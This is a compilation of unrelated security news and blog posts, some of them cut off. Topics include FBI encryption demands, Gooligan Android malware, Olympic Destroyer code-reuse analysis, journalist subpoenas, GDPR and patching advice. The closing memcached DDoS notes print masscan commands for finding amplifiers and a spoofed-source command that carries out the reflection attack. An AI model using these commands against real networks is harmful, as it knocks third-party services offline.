There were several regulatory stories that made headlines this week, including the FBI’s continued push for a stronger partnership with the private sector when it comes to encryption, allegations that Geek Squad techs act as FBI spies, and new data breach notification laws.

In a keynote address at Boston College’s cybersecurity summit, FBI Director Christopher Wray said that there were 7,775 devices that the FBI could not access due to encryption in fiscal 2017, despite having approval from a judge. According to Wray, that meant the FBI could not access more than half of the devices it tried to access during the period.

“Let me be clear: the FBI supports information security measures, including strong encryption,” Wray said. “Actually, the FBI is on the front line fighting cyber crime and economic espionage. But information security programs need to be thoughtfully designed so they don’t undermine the lawful tools we need to keep the American people safe.”

However, Ars Technica noted that a consensus of technical experts has said that what the FBI has asked for is impossible.

In addition, the Electronic Frontier Foundation obtained documents via a Freedom of Information Act lawsuit that revealed the FBI and Best Buy’s Geek Squad have been working together for decades. In some cases Geek Squad techs were paid as much as $1,000 to be informants, which the EFF argued was a violation of Fourth Amendment rights as the computer searches were not authorized by their owners.

Finally, the Alabama senate unanimously passed the Alabama Breach Notification Act, and the bill will now move to the house.

“Alabama is one of two states that doesn’t have a data breach notification law,” said state Senator Arthur Orr, who sponsored Alabama’s bill. “In the case of a breach, businesses and organizations, including state government, are under no obligation to tell a person their information may have been compromised.”

With both Alabama and South Dakota recently introducing data breach notification legislation, every resident of the U.S. may soon be protected by a state breach notification law.

Security is not a buzz-word business model, but our cumulative effort

This article conveys my personal opinion on security and its underlying revenue model; I would recommend reading it with a pinch of salt (+ tequila, while we're at it). I shall cover either side of the coin: the heads, where pentesters try to give you a heads-up on underlying issues, and the tails, where businesses still think they can address security at the tail end of their development.

A recent conversation with a friend who works in information security prompted me to address the elephant in the room. He works at a security services firm that provides intelligence feeds and alerts to clients. He shared a case where his firm didn't share the right feed at the right time, even though the client was "vulnerable", because the client was on a different subscription tier. I understand business is essential, but isn't security a collective effort? Tomorrow, when this client gets attacked, are you just going to turn a blind eye because it didn't pay you enough? I understand that remediation always costs money (or effort), but withholding an alert about an attack you witnessed in the wild based on how much a client is paying you is hard to defend.

I don't dream of a utopian world where security is a given, but we can surely walk in that direction.

What is security to a business?

Is it a domain, a pillar, or, with the buzz these days, insurance? Information security and privacy, while the talk of the town, still come in where the business requirements end. I understand there is a paradigm shift to the left, a movement toward the inception of your "bright idea", but we are still far from an ideal world, the utopia so to speak! I have experience on either side of the table: the one where we put ourselves in the shoes of hackers, and the other where we hold hands with the developers to understand their pain points and work together to build a secure ecosystem. I would say it's been very few times that a business pays attention to "security" from day zero (yeah, this tells you the kind of clients I deal with and why we are in business). Often business owners say: develop this application based on these requirements, discuss the revenue model and maintenance costs, and, oh yeah, check whether we need these security add-ons or adhere to compliance checks, since no one wants auditors knocking at the door for all the wrong reasons.

This troubles me. Why don't we treat information security as a pillar as important as the whole revenue model?

How is security as a business?

I have many issues with how "security" is tossed around as a buzz-word to earn dollars while very few respect the gravity, or the very objective, of its existence. Whether it's information, financial, or life security, they all have very real and quantifiable effects on someone's well-being. Every month, I see tens (if not hundreds) of reports and advisories whose quality is embarrassingly bad. When you try to find the reasons, it's either that the "good" firms are costly, or that someone has a comfort zone with existing firms, or, worst of all, that the business neither cares nor pressures firms for better quality. In the end, it's just a plain and straightforward business transaction, or a compliance check to make the auditor happy.

Have you ever asked yourself these questions?

  1. You did a pentest; did its quality justify the money paid? If tomorrow that hospital gets hacked, or patients die, would you say you didn't put in your best consultants or best efforts because they were too expensive for the cause? That you didn't walk the extra mile because the budgeted hours ran out?
  2. Now, to you, Mr. Business CEO: you want to cut costs on security because you would prefer a more prominent advertisement or a better car in your garage, and security expenditure seems dubious to you. Next time, check how much companies have lost after getting breached. Just because it's not an urgent problem doesn't mean it can't become one, and if it does, chances are it's too late. These issues are like symptoms: if you can see them, you are already in trouble! Security doesn't always have an immediate ROI, I understand, but don't make it an epitome of "out of sight, out of mind". That's a significant risk you are taking with your revenue, employees, and customers.

Now that I have touched on both sides of the problem in this short article, I hope you got the message (fingers crossed). Please take security seriously, and not only as a business transaction! Every time you do something that involves security, on either side, think: would you invest your next big cryptocurrency in an exchange/market that gets hacked because of its lack of due diligence? Would your medical records become public because someone didn't perform a good pentest? Would you lose your savings because your bank didn't do a thorough "security" check of its infrastructure? If you think you are untouchable because of your home router's security, you, my friend, are living in an illusion. And my final rant goes to the firms with good consultants whose reporting, or seriousness in delivering the message to the business, is so fcuking messed up that all their efforts go in vain. Take your deliverable seriously; it's the only window the business has to peep into the issues (existing or foreseen) and plan remediation in time.

That's all, my friends. Stay safe and be responsible; security is a cumulative effort, and everyone has to be vigilant because you never know where the next cyber-attack will be.

Happy Anniversary – Paul’s Security Weekly #550

This week, Stefano Righi of UEFI joins us for an interview! Sven Morgenroth, Security Researcher at Netsparker joins us for the Technical Segment! In the news, we have updates from FinFisher, Equifax, Facebook, and more on this episode of Paul's Security Weekly!


Taking down Gooligan: part 1 — overview

This series of posts recounts how, in November 2016, we hunted for and took down Gooligan, the infamous Android OAuth stealing botnet. What makes Gooligan special is its weaponization of OAuth tokens, something that was never observed in mainstream crimeware before. At its peak, Gooligan had hijacked over 1M OAuth tokens in an attempt to perform fraudulent Play store installs and reviews.

Gooligan marks a turning point in Android malware evolution as the first large scale OAuth crimeware

While I rarely talk publicly about it, a key function of our research team is to assist product teams when they face major attacks. Gooligan’s very public nature and the extensive cross-industry collaboration around its takedown provided the perfect opportunity to shed some light on this aspect of our mission.

Being part of the emergency response task force is a central aspect of our team, as it allows us to focus on helping our users when they need it the most and exposes us to tough challenges in real time, as they occur. Overcoming these challenges fuels our understanding of the security and abuse landscape. Quite a few of our most successful research projects started due to these escalations, including our work on fake phone-verified accounts, the study of HTTPS interception, and the analysis of mail delivery security.

Subjects covered in this post

Given the complexity of this subject, I broke it down into three posts to ensure that I can provide a full debrief and cover all the major aspects of the Gooligan escalation. This first post recounts the Gooligan origin story and offers an overview of how Gooligan works. The second post provides an in-depth analysis of Gooligan’s inner workings and its network infrastructure. The final post discusses Gooligan’s various monetization schemes and its takedown.

This series of posts is modeled after the talk I gave with Oren Koriat from Check Point at Botconf in December 2017. Here is a re-recording of the talk:

You can get the slides here, but they are pretty bare.

As OAuth token abuse is Gooligan’s key innovation, let’s start by quickly summarizing how OAuth tokens work, so it is clear why this is such a game changer.

What are OAuth tokens?

OAuth app list

OAuth tokens are the de facto standard for granting apps and devices restricted access to online accounts without sharing passwords and with a limited set of privileges. For example, you can use an OAuth token to only allow an app to read your Twitter timeline, while preventing it from changing your settings or posting on your behalf.

OAuth flow

Under the hood, the service provides the app, on your behalf, with an OAuth token that is tied to the exact privileges you want to grant. In a similar (though not identical) way, when you sign in with your Google account on an Android device, Google gives the device a long-term token that allows it to access Google services on your behalf. This is the token that Gooligan stole in order to impersonate users on the Play Store. You can read more about Android long-term tokens here.
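As a toy illustration of scoped access (the names here are hypothetical, not any real provider's API), a token can be modeled as a credential carrying a limited scope set that the service checks on every request, so the app never needs your password and never gains more privileges than you granted:

```python
import secrets

# Toy model of scoped OAuth access (hypothetical names, no real API):
# the token grants a limited set of privileges, and the service checks
# the scope on every request instead of ever seeing your password.

def issue_token(user, scopes):
    return {"user": user, "scopes": set(scopes), "value": secrets.token_hex(16)}

def authorize(token, required_scope):
    return required_scope in token["scopes"]

token = issue_token("alice", {"timeline:read"})

print(authorize(token, "timeline:read"))   # → True: reading is allowed
print(authorize(token, "settings:write"))  # → False: token can't change settings
```

The danger Gooligan exploited is that a stolen long-term token is as good as the grant itself: whoever holds it inherits every scope it carries until it is revoked.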


Gooligan overview

Overall, Gooligan is made of six key components:

  • Repackaged app: This is the initial payload, usually a popular app that was repackaged and weaponized. The APK embeds a secondary hidden/encrypted payload.
  • Registration server: Records device information when a device joins the botnet after being rooted.
  • Exploit server: The exploit server is the system that will deliver the exact exploit needed to root the device, based on the information provided by the secondary payload. Having the device information is essential, as Kingroot only targeted unpatched older devices (4.x and below). The post-rooting process is also responsible for backdooring the phone recovery process to enable persistence.
  • Fraudulent app and ads C&C: This infrastructure is responsible for collecting exfiltrated data and telling the malware which (non-Google related) ads to display and which Play store app to boost.
  • Play Store app module: This is an injected library that allows the malware to issue commands to the Play store through the Play store app. This complex process was set up in an attempt to avoid triggering Play store protection.
  • Ads fraud module: This is a module that would regularly display ads to the users as an overlay. The ads were benign and came from an ad company that we couldn’t identify.


Analyzing Gooligan’s code allowed us to trace it back to earlier malware families, as it built upon their codebase. While those families are clearly related code-wise, we can't ascertain whether the same actor is behind all of them, because a lot of the shared features were extensively discussed in Chinese blogs.

Gooligan timeline

SnapPea the precursor

As visible in the timeline above, Gooligan’s genesis can be traced back to the SnapPea adware that emerged in March 2015 and was discovered by Check Point in July of the same year. SnapPea’s key innovation was the weaponization of the Kingroot exploit kit, which until then was used by enthusiasts to root their phones and install custom ROMs.

Blog post announcing SnapPea discovery

SnapPea’s straightforward weaponization of Kingroot led to a rather unusual infection vector: its authors backdoored the backup application SnapPea to infect victims. After an Android device was physically connected to an infected PC, the malicious SnapPea application used Kingroot to root the device and install malware on it. Gooligan is related to SnapPea in that it also uses Kingroot exploits to root devices, but in an untethered way, via a custom remote server.

Following in SnapPea’s footsteps, Gooligan weaponizes the Kingroot exploits to root old, unpatched Android devices.

Ghost Push the role model

Blog post discussing Ghost Push discovery

A few months after SnapPea appeared, Cheetah Mobile uncovered Ghost Push, which quickly became one of the largest Android (off-market) botnets. What set Ghost Push apart technically from SnapPea was the addition of code that allowed it to persist across device resets. This persistence was accomplished by patching, among other things, the recovery script located in the system partition, after Ghost Push gained root access the same way SnapPea did. Gooligan reused the same persistence code.

Gooligan borrowed from Ghost Push the code used to ensure its persistence across device resets.


As outlined in this post, Gooligan is a complex piece of malware that built on previous malware generations and extended them with a brand-new attack vector: OAuth token theft.

Gooligan marks a turning point in Android malware evolution as the first large-scale OAuth crimeware.

Building on this post, the next one in the series will provide an in-depth analysis of Gooligan’s inner workings and of its network infrastructure. The final post will discuss Gooligan’s various monetization schemes and its takedown.


Hunting down Gooligan — retrospective analysis

This talk provides a retrospective on how, during 2017, Check Point and Google jointly hunted down Gooligan, one of the largest Android botnets at the time. Besides its scale, what makes Gooligan a worthwhile case study is its heavy reliance on stolen OAuth tokens to attack Google Play’s API, an approach previously unheard of in malware.

This talk starts by providing an in-depth analysis of how Gooligan’s kill chain works, from infection and exploitation to system-wide compromise. Then, building on various telemetry, we will shed light on which devices were infected and how this botnet attempted to monetize the stolen OAuth tokens. Next, we will discuss how we were able to uncover the Gooligan infrastructure and tie it to another prominent malware family: Ghost Push. Last but not least, we will recount how we went about re-securing the affected users and taking down the infrastructure.

From Russia(?) with Code

The Olympic Destroyer cyberattack is a very recent and notable attack by sophisticated threat actors against a globally renowned 2-week sporting event that takes place once every four years in a different part of the world. Successfully attacking the Winter Olympics requires motivation, planning, resources and time.

Cyberattack campaigns are often a reflection of real-world tensions and provide insight into the possible suspects in an attack. Much has been written about the perpetrators behind Olympic Destroyer emanating from either North Korea or Russia. Both have motivations. North Korea would like to embarrass its sibling South Korea, the host of the 23rd Winter Olympics. Russia could be seeking revenge for the IOC ban on its team. And Russia has precedent, having previously been blamed for attacks on other sporting organizations, such as the intrusion at the World Anti-Doping Agency, which was targeted via a stolen International Olympic Committee account.

There has been much said about attribution, with accusations of misleading false flags and anti-forensics built into the malware. As Talos points out in their report, attribution is hard.

But attribution is not just hard, it’s often a wilderness of mirrors and, more often than not, a bit anticlimactic.

The motivation of our following analysis is not to point the finger of blame about who did the attacking, but to utilize our expertise in analyzing malware code and understanding the behaviors it exhibits to highlight the heritage, evolution and commonalities we found in the code of the Olympic Destroyer malware.

Initial Samples of Code Reuse

Besides analyzing the behavior of a sample, our sandbox performs several levels of code analysis, eventually extracting all code components, regardless of whether they are executed at run time. As we described in a blog post a few years ago, this technique is essential for detecting any dormant functionality that might be present within the sample.

After decomposing the code components into normalized basic blocks, the sandbox computes smart code hashes that are stored and indexed in our threat intelligence knowledge base. Over the last three years we have been collecting code hashes for millions of files, so when we want to hunt for other samples related to the same actor, we are able to query our backend for any other binaries that have been reusing significant amounts of code.

The rationale is that actors usually build up their code base over time and reuse it again and again across different campaigns. Code might evolve, but some components are bound to remain the same. This is the intuition that drove our investigation of Olympic Destroyer further. The first results were, unsurprisingly, variants of the Olympic Destroyer binaries we had already mentioned in our previous post. However, it quickly got far more interesting.
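The post does not publish the hashing algorithm itself, but the idea of hashing normalized basic blocks can be sketched in a few lines. In this illustrative Python sketch (the normalization rules and instruction strings are hypothetical simplifications; real systems operate on disassembled binaries), operand values are masked out so that the same logic compiled at different addresses or with different register allocation produces the same hash:

```python
import hashlib
import re

def normalize(instr: str) -> str:
    """Mask operand values so hashes survive relocation and register
    renaming (a toy normalization for illustration only)."""
    instr = re.sub(r"0x[0-9a-fA-F]+", "IMM", instr)    # immediates/addresses
    instr = re.sub(r"\b(e|r)?[abcd]x\b", "REG", instr) # a few x86 registers
    return instr

def block_hash(block: list[str]) -> str:
    """Hash a basic block's normalized instruction sequence."""
    canon = "\n".join(normalize(i) for i in block)
    return hashlib.md5(canon.encode()).hexdigest()

# Two "compilations" of the same logic, differing in addresses and registers:
a = ["mov eax, 0x401000", "add eax, 0x10", "ret"]
b = ["mov ebx, 0x402340", "add ebx, 0x20", "ret"]
print(block_hash(a) == block_hash(b))  # True: same normalized shape
```

Indexing such hashes across millions of files is what makes it possible to query for "any other binary reusing this block," which is exactly the pivot described next.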

A very specific code hash led us through this process: 7CE26E95118044757D3C7A97CF9D240A (Lastline customers can use it to query our Global Threat Intelligence Network). This rare code hash surprisingly linked 21ca710ed3bc536bd5394f0bff6d6140809156cf, a payload of the Olympic Destroyer campaign, with some other samples of a remote access trojan, “TVSpy.” Though the threat’s actual internal name is TVRAT, the malware is known and labelled in VirusTotal as Trojan.Pavica or Trojan.Mezzo, neither of which was previously connected to the original Olympic Destroyer campaign.

Figure 1 shows the actual code referenced by the code hash: it is a function used to read a buffer and subsequently parse a PE header from it.

Figure 1: The code referenced by the code hash 7CE26E95118044757D3C7A97CF9D240A, shared by both the Olympic Destroyer sample 21ca710ed3bc536bd5394f0bff6d6140809156cf (SHA1) and the TVSpy sample a61b8258e080857adc2d7da3bd78871f88edec2c.

This is not where the code reuse ends, as the function referencing and invoking the following fragment (see Figure 2) also shares almost all of the same logic. This function is responsible for loading a PE file from a memory buffer and executing its entry point.

Figure 2: Function responsible for loading PE file from memory reused in both Olympic Destroyer and TV Spy

A Deeper Dive Based on Unusual Code

We decided to investigate this piece of code further, since loading a PE from memory is not all that common. Its origin raised several questions:

  1. Why is that piece of code the only link between the two samples?
  2. Were there any other samples sharing the same code?

Our first discovery was the remote access trojan called TVSpy, mentioned above. This family has been the subject of a few previous research investigations, and a recent Benkow Lab blog post (from November 2017) even reported that the source code was available on GitHub.

Unfortunately, all links to GitHub are now dead. But that didn’t stop us from finding the actual source code (or at least evidence that it was indeed published at some point). Apparently it was sold for US$500 on an underground Russian forum in 2015. Even though the original post and links are gone, a Russian information security forum kept a copy of the source code package alongside a description of the original sale announcement (see Figure 3).

Figure 3: TVSpy code as sold in an underground forum (according to researchers from

Not Enough – The Investigation Continued

Although interesting, this connection was ultimately not enough to tie Olympic Destroyer to Russia or to TVSpy. So we kept digging. Further research finally identified the code in Figures 1 and 2 as part of an open source project called LoadDLL (see Figure 4), available on (first published back in March 2014).

Figure 4: Fragment of LoadDLL source code from LoadDLL project

However, a couple of things still didn’t add up: why had we only managed to identify samples from 2017 when the source code was released in 2014? What about older versions of TVSpy? How come our search didn’t return any of those samples? Were the Olympic Destroyer and TVSpy samples from 2017 sharing more than just the LoadDLL code?

Apparently TVSpy went through a few transformations. Samples from 2015 did embed and use the LoadDLL code, but the compiler applied some specific optimizations that made the code unique (see Figure 5). In particular, the compiler optimized out both “flags” (not used in the function) and “read_proc” (a statically linked function) from the parameters of LoadDll, but it couldn’t optimize out an “if (read_proc)” check, even though the check is useless since “read_proc” is no longer passed as a parameter.

Figure 5. Reconstructed source code of LoadDll from TVSpy dated back to 2015

The “read_proc” function itself is also identical to the one from the source code (see Figures 6 and 7), and as you can see in Figure 8, it also gets called in exactly the same way as in the original source code from

Figure 6: read_proc function implementation

Figure 7: read_proc function implementation

The most interesting aspect for us is in fact the version of TVSpy that dates back to 2017–2018 and shares with Olympic Destroyer almost the exact binary code of LoadDLL. You can see LoadDll_LoadHeaders for those samples in Figure 9: as you might notice, the function looks different than the one from the older version (see Figure 8).

Figure 8. Reconstructed source code of LoadDLL_LoadHeaders function from TVSpy dated back to 2015

At first, we thought that the authors had added new checks before calling the read_proc function, making a clear link between Olympic Destroyer and TVSpy (how, after all, could there be the same code modifications if the authors were not the same?). However, after further review we realized that read_proc didn’t exist anymore. Instead, it had been inlined by the compiler, resulting in a statically linked memcpy function.

Figure 9. Reconstructed LoadDLL_LoadHeaders from TVSpy and OlympicDestroyer samples, including additional check due to inlining of the read_proc function.

Also, the meaningless check in LoadDll (“if (read_proc)”) we mentioned before has disappeared in the new version of the code (see Figure 10).

Figure 10. Reconstructed LoadDLL_LoadHeaders from TVSpy and Olympic Destroyer samples, including additional check due to inlining of the read_proc function.

The Bottom Line – Evidence is Inconclusive

In conclusion, we believe there is not enough evidence to substantiate a claim that Olympic Destroyer and the new versions of TVSpy, which use the same modified source code, were built by the same author.

The more probable explanation, in our view, is that the sample was built with a newer compiler that further optimized the code. That would still mean that both the new version of TVSpy and Olympic Destroyer were built using the same toolchain, configured in the very same way (full optimization enabled and the C++ runtime statically linked). We actually went to the extent of compiling LoadDLL with MS Visual Studio 2017 with the C++ runtime statically linked, and we managed to get the very same code as the one included in both Olympic Destroyer and TVSpy.

Although we would have liked to finally solve the dilemma and unveil which actors were behind the Olympic Destroyer attack, we ended up with more questions than answers. But admittedly, that’s what research sometimes is about.

First, why would the authors of allegedly state-sponsored malware use an old open source LoadDLL project from 2014? It is hard to believe that they could not come up with their own implementation, or at least use a much more advanced open source project, rather than relying on an educational prototype buried well beyond the first page of Google results.

Or maybe the actors were not as advanced as we would like to think; maybe they saw this as a one-time job, without enough resources to avoid using publicly available source code to quickly build their malware. Or maybe it’s just another false flag, and the real authors decided to use the TVSpy source code as released in 2015 to leave a “Russian fingerprint”?

Maybe all of the above?

At the beginning of this article we stated that attribution is not just hard; it’s often a wilderness of mirrors and, more often than not, a bit anticlimactic. As a matter of fact, that turned out to be quite a precise prediction.

The post From Russia(?) with Code appeared first on Lastline.

"Faster payment" scam is not quite what it seems

I see a lot of "fake boss" fraud emails in my day job, but it's rare that I see them sent to my personal email address. These four emails all look like fake boss fraud emails, but there's something more going on here.

From:    Ravi [Redacted]
Reply-To:    Ravi [Redacted]
To:
Date:    23 February 2018 at 12:02

An increasing number of journalists have recently faced subpoenas

Wikimedia Commons

In mid-January, two police officers visited the home of documentary filmmaker Nora Donaghy in Los Angeles, showed her a search warrant, and seized her cell phone. She was also subpoenaed to testify in a grand jury trial about her communications with a source.

Three months into 2018, the most under-the-radar threat to press freedom has shown itself to be not arrests of or attacks on journalists, but rather subpoenas to produce documents or attempts to force journalists to testify about their sources.

While few of these cases have made national headlines because the Trump administration has not been involved, journalists in state and local jurisdictions have been subpoenaed to testify in court by government actors five times already this year, in addition to at least five times in 2017. (Update: Shortly after this post was published, Freedom of the Press Foundation became aware of a sixth subpoena in 2018.)

Donaghy’s colleague William Erb was issued a similar subpoena. Although several news organizations have reported that a ruling was made on these subpoenas, no decision has been made public. Additionally, three Chicago-based newspapers—the Chicago Sun-Times, Chicago Tribune, and Daily Herald—were subpoenaed in January 2018 to produce copies of all stories they had run about the fatal police shooting of teenager Laquan McDonald.

In December 2017, investigative journalist Jamie Kalven was subpoenaed by defense attorneys for a Chicago police officer to testify and reveal details about his sources in the criminal trial of the officer in Cook County, Illinois. A month prior, across the country in San Diego, freelance reporter Kelly Davis was ordered to testify at a deposition by the County of San Diego and turn over unpublished materials used in her reporting. These subpoenas, both of which were later quashed, are just two examples of subpoenas against journalists last year.

(Note: The U.S. Press Freedom Tracker does not count legal orders by private parties, but rather only those issued by government prosecutors or agencies ordering journalists to testify in court. We also count legal orders brought by government officials acting in a private capacity.)

When we launched the U.S. Press Freedom Tracker, we weren’t counting legal actions like subpoenas and prior restraint the way we were arrests. While the Tracker has highlighted each individual instance of assaults and arrests since its inception, we predicted that subpoenas would be less common. The Tracker has only been documenting press freedom violations that have occurred since January 2017, so it’s difficult to make conclusions about the prevalence of subpoenas. But the sudden uptick in subpoenas served on journalists just in the past six months is deeply worrying.

To reflect the frequency and press freedom significance of these subpoenas, we modified the counter on the Tracker’s homepage. Although previously it displayed the number of border stops of journalists, it now shows the number of subpoenas.

Legal action that mandates journalists to turn over their reporting materials or reveal information about their sources is always concerning. Investigative journalism, and journalism that challenges power, requires the ability of journalists to keep their sources and reporting processes confidential—especially in the face of legal process.

“A democracy requires a free flow of information to the public.  But if a journalist may be forced to disclose the identity of a confidential source, then potential whistleblowers who are concerned about maintaining their anonymity will be less likely to come forward with important information about government or corporate misconduct. So ultimately the public loses out on this valuable information, and the health of our democracy suffers,” says Sarah Matthews, Staff Attorney at Reporters Committee for Freedom of the Press.

It’s a decades-old problem. Journalists have, since the 1970s, gone to jail rather than give up their sources in court. In response, thankfully, many states have “press shield” or “reporter’s privilege” laws. Such laws, which exist in approximately 40 states, aim to provide at least some protection for journalists to avoid testifying about their sources or information that they obtained as part of their newsgathering processes.

Unfortunately, not every state has such laws, and many reporter’s privilege statutes were written decades ago and are no longer adequate in the digital age. While the prospect for passing a strong federal shield law faces increasingly long odds (and could potentially have unintended consequences for press freedom), state legislatures can provide important protections to journalists by updating or passing new press shield laws that take into account the shifting nature of online journalism.

Subpoenaing journalists for their confidential information may be a long-standing problem, but at least at the state and local level, it is not one that will be going away anytime soon. We’ll continue to systematically document every such incident with the U.S. Press Freedom Tracker as long as the practice persists.

How prepared is your business for the GDPR?

The GDPR is the biggest privacy shakeup since the dawn of the internet, and it is just weeks before it comes into force on 25th May. The GDPR comes with potentially head-spinning financial penalties for businesses found not to be complying, so it really is essential for any business which touches EU citizens' personal data to thoroughly do its privacy-rights homework and properly prepare.

Sage have produced a nice GDPR infographic which breaks down the basics of the GDPR with tips on complying, which is shared below.

I am currently writing a comprehensive GDPR Application Developer's Guidance series for IBM developerWorks, which will be released in the coming weeks.

The GDPR: A guide for international business - A Sage Infographic

How to Prevent a Breach From Spring Break

Spring Break vulnerability

Spring Break, the latest named vulnerability, is more serious than the moniker implies. Spring Break is a critical remote code execution vulnerability in Pivotal Spring REST, one of the most popular frameworks for building web applications, and the effects of this vulnerability are widespread.

A patch for Spring Break has been available since September of last year, but the vulnerability broke into the news only last week, after the researchers who discovered Spring Break published their findings. The researchers agreed to hold back publishing until now, allowing organizations more time to update their applications. Pivotal recommended patching the vulnerability as soon as possible, in a blog post from Spring Data Project Lead Oliver Gierke. Yet even after six months, many organizations with applications built using the Spring REST component are likely still unpatched.

The attention Spring Break is getting in the media and in security circles is warranted, because of the urgency in patching affected applications, and because it raises serious concerns about application security as a whole. It’s notoriously difficult for businesses to maintain their software and patch vulnerabilities in components, whether they be commercial or open source libraries and frameworks. That’s because many developers are unaware of the components in their applications, and no one is assigned the responsibility to update components when a new version is available.

The consequences of inaction are severe. We don’t know at this point whether the easily exploitable Spring Break vulnerability has been used in any attacks, but a similar RCE vulnerability found in Apache Struts last year was the root of a recent mega-breach, which put the data of 143 million Americans at risk.

With so much of our economy dependent on software, we can’t afford to leave it to chance that unpatched applications will not be discovered or exploited by bad actors. Fortunately, there are some essential but achievable steps organizations can take to secure their applications from known vulnerabilities in components.

1. Set a policy

Set a policy establishing that component vulnerabilities are important to the business, just like other non-functional requirements such as availability. Having a policy can also ensure that there’s traceability between security requirements and regulations. Several industry regulations, including the recently enacted New York Department of Financial Services rules, along with healthcare and PCI rules, require organizations to manage risk from third-party components.

2. Create a baseline inventory

There are several ways to build an inventory, including looking at source control or component repositories. One of the most reliable methods may be leveraging security testing you are already doing. Some static analysis providers may already be creating an inventory of components for you through software composition analysis. An inventory can be invaluable to the security team’s response to a newly announced vulnerability, allowing you to focus your efforts on the applications that you know have the vulnerable component.
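Once a baseline inventory exists, the response to a newly announced vulnerability boils down to a join between that inventory and the advisory. A minimal Python sketch of that check follows; the component names, version numbers, and `Advisory` structure are all illustrative, not taken from any real advisory feed:

```python
from dataclasses import dataclass

@dataclass
class Advisory:
    component: str
    fixed_in: tuple  # first safe version, as a comparable tuple

def parse_version(v: str) -> tuple:
    """Turn '2.6.8' into (2, 6, 8) so versions compare numerically."""
    return tuple(int(x) for x in v.split("."))

def vulnerable(inventory: dict, advisories: list) -> list:
    """Return (component, version) pairs older than the fixed version."""
    findings = []
    for adv in advisories:
        ver = inventory.get(adv.component)
        if ver and parse_version(ver) < adv.fixed_in:
            findings.append((adv.component, ver))
    return findings

# Hypothetical inventory and advisory for illustration:
inventory = {"spring-data-rest": "2.6.8", "commons-collections": "3.2.2"}
advisories = [Advisory("spring-data-rest", (2, 6, 9))]
print(vulnerable(inventory, advisories))  # [('spring-data-rest', '2.6.8')]
```

The value of the inventory is exactly this: the lookup takes seconds, instead of a scramble to discover which applications even contain the component.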

3. Educate developers

Some developers may be unaware that they need to monitor for new security patches, or that the components they use may rely on other components that may not be secure. CA Veracode research last year found that a vulnerability in Apache Commons Collections (ACC) had spread to more than 80,000 other components that used the ACC component. Fortunately, a focus on developer education leads to measurable results. Our research for the State of Software Security shows that organizations using developer education, whether delivered in one-on-one sessions or through self-paced video courses, saw improvements in flaw reduction.

4. Integrate security testing throughout the development lifecycle

As development teams make more changes to their applications, it’s important to keep the inventory, and the security picture, up to date. Software composition analysis makes this easy by collecting information about your application’s open source components at the same time that static analysis is conducted – including open source components used by compiled libraries for which you have no source code.

5. Shift the mindset

The functionality open source components deliver can be an asset to a development team, but keep in mind that the asset is offset by technical debt that requires regular payments, in the form of applying regularly released updates to the open source library. And just as with regular debt, failure to make regular payments on technical debt can have catastrophic consequences downstream.

Too often we begin to focus on preventive measures like these after the damage has been done. It’s time to take action to make sure you don’t get breached by the next Spring Break, whatever it may be called.


To learn more about how to reduce risk from third-party components, watch a short video and download our whitepaper. Check out the video below, with CA Veracode VP of Research Chris Eng, explaining how to determine whether a branded vulnerability, like Heartbleed, Shellshock or Spring Break, requires fast action or is more hype than harm.


Some notes on memcached DDoS

I thought I'd write up some notes on the memcached DDoS. Specifically, I describe how many I found scanning the Internet with masscan, and how to use masscan as a killswitch to neuter the worst of the attacks.

Test your servers

I added code to my port scanner for this, then scanned the Internet:

masscan -pU:11211 --banners | grep memcached

This example scans the entire Internet (/0). Replace with your address range (or ranges).

This produces output that looks like this:

Banner on port 11211/udp on [memcached] uptime=230130 time=1520485357 version=1.4.13
Banner on port 11211/udp on [memcached] uptime=3935192 time=1520485363 version=1.4.17
Banner on port 11211/udp on [memcached] uptime=230130 time=1520485357 version=1.4.13
Banner on port 11211/udp on [memcached] uptime=399858 time=1520485362 version=1.4.20
Banner on port 11211/udp on [memcached] uptime=29429482 time=1520485363 version=1.4.20
Banner on port 11211/udp on [memcached] uptime=2879363 time=1520485366 version=1.2.6
Banner on port 11211/udp on [memcached] uptime=42083736 time=1520485365 version=1.4.13

The "banners" check filters for valid memcached responses, so you don't get other stuff that isn't memcached. To filter this output further, use 'cut' to grab just column 6:

... | cut -d ' ' -f 6 | cut -d: -f1

You often get multiple responses to just one query, so you'll want to sort/uniq the list:

... | sort | uniq

My results from an Internet wide scan

I got 15181 results (or roughly 15,000).

People are using Shodan to find a list of memcached servers. They might be getting a lot of results back for servers that respond on TCP instead of UDP. Only UDP can be used for the attack.

Other researchers scanned the Internet a few days ago and found ~31k. I don't know if this means people have been removing these from the Internet.

Masscan as exploit script

BTW, you can not only use masscan to find amplifiers, you can also use it to carry out the DDoS. Simply import the list of amplifier IP addresses, then spoof the source address as that of the target. All the responses will go back to the source address.

masscan -iL amplifiers.txt -pU:11211 --spoof-ip --rate 100000

I point this out to show how there's no magic in exploiting this. Numerous exploit scripts have been released, because it's so easy.

Why memcached servers are vulnerable

Like many servers, memcached listens on the local IP address for local administration. By listening only on the local IP address, remote users cannot talk to the server.

However, this configuration is often botched, and you end up listening either on (all interfaces) or on one of the external interfaces. There's a common Linux network stack issue where this keeps happening, such as when trying to get VMs connected to the network. I forget the exact details, but the point is that lots of servers that intend to listen only on end up listening on external interfaces instead. It's not a good security barrier.

Thus, there are lots of memcached servers listening on their control port (11211) on external interfaces.
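The difference between the two bind modes is easy to demonstrate. This short Python sketch (using ephemeral ports so it runs anywhere) shows a loopback-only bind next to the wildcard bind that causes the exposure described above:

```python
import socket

# A service intended for local-only administration should bind explicitly
# to the loopback address; binding to the wildcard address exposes the
# port on every interface -- the misconfiguration behind exposed memcached.
local_only = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
local_only.bind(("127.0.0.1", 0))   # loopback only: unreachable remotely

wildcard = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
wildcard.bind(("", 0))              # "" means all interfaces

print(local_only.getsockname()[0])  # 127.0.0.1
print(wildcard.getsockname()[0])    # 0.0.0.0
local_only.close()
wildcard.close()
```

For memcached specifically, the fix is to set the listen address explicitly (and/or firewall UDP 11211), rather than trusting the default.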

How the protocol works

The protocol is documented here. It's pretty straightforward.

The easiest amplification attack is to send the "stats" command. This is a 15-byte UDP packet that causes the server to send back a large response full of useful statistics about the server. You often see around 10 kilobytes of response across several packets.
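The 15 bytes break down as an 8-byte memcached UDP frame header (request ID, sequence number, datagram count, reserved) followed by the ASCII command. A small Python sketch constructing that probe:

```python
import struct

def udp_frame(request_id: int, payload: bytes) -> bytes:
    """Prefix a memcached ASCII command with the 8-byte UDP frame header:
    request id, sequence number (0), total datagrams (1), reserved (0)."""
    return struct.pack("!HHHH", request_id, 0, 1, 0) + payload

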